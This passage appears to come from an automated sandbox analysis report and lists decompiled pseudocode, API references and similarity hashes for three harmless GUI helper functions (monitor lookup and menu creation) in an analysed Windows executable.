                                                    0x0043b37f
                                                    0x0043b384
                                                    0x0043b398
                                                    0x0043b3af
                                                    0x00000000
                                                    0x00000000
                                                    0x0043b3af
                                                    0x00000000
                                                    0x0043b3b1
                                                    0x0043b3b1
                                                    0x00000000
                                                    0x0043b367
                                                    0x0043b3b9
                                                    0x0043b3c2

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$EqualIntersect
                                                    • String ID: @
                                                    • API String ID: 3291753422-2766056989
                                                    • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                    • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                    • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C794 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49e92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x49e90c; // 0x42c794
					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x49e90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                    0x0042c79a
                                                    0x0042c7a4
                                                    0x0042c7ce
                                                    0x0042c7d7
                                                    0x0042c7ff
                                                    0x0042c7ff
                                                    0x0042c7d9
                                                    0x0042c7d9
                                                    0x0042c7de
                                                    0x00000000
                                                    0x00000000
                                                    0x0042c7de
                                                    0x0042c7a6
                                                    0x0042c7ab
                                                    0x0042c7b8
                                                    0x0042c7ca
                                                    0x0042c7ca
                                                    0x0042c80a

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C7E2
                                                    • GetSystemMetrics.USER32 ref: 0042C7F4
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromPoint
                                                    • API String ID: 1792783759-1072306578
                                                    • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                    • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                    • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E0042C66C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49e92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49e908; // 0x42c66c
					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x49e908(_t14, _t17);
				}
				return _t19;
			}












                                                    0x0042c672
                                                    0x0042c675
                                                    0x0042c67f
                                                    0x0042c6a4
                                                    0x0042c6ad
                                                    0x0042c6d4
                                                    0x0042c6d4
                                                    0x0042c681
                                                    0x0042c686
                                                    0x0042c693
                                                    0x0042c6a0
                                                    0x0042c6a0
                                                    0x0042c6df

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C6BD
                                                    • GetSystemMetrics.USER32 ref: 0042C6C9
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$AddressProc
                                                    • String ID: MonitorFromRect
                                                    • API String ID: 1792783759-4033241945
                                                    • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                    • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                    • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044AE70(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x449b38; // 0x449b84
					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E00449F18();
					}
					E0044AC00(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                    0x0044ae71
                                                    0x0044ae77
                                                    0x0044ae7c
                                                    0x0044ae89
                                                    0x0044ae9a
                                                    0x0044ae8b
                                                    0x0044ae90
                                                    0x0044ae90
                                                    0x0044aea1
                                                    0x0044aea8
                                                    0x0044aea8
                                                    0x0044aeaf
                                                    0x0044aeaf
                                                    0x0044aeb8

                                                    APIs
                                                    • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMenu$Popup
                                                    • String ID: .B
                                                    • API String ID: 257293969-2011479308
                                                    • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                    • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                    • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%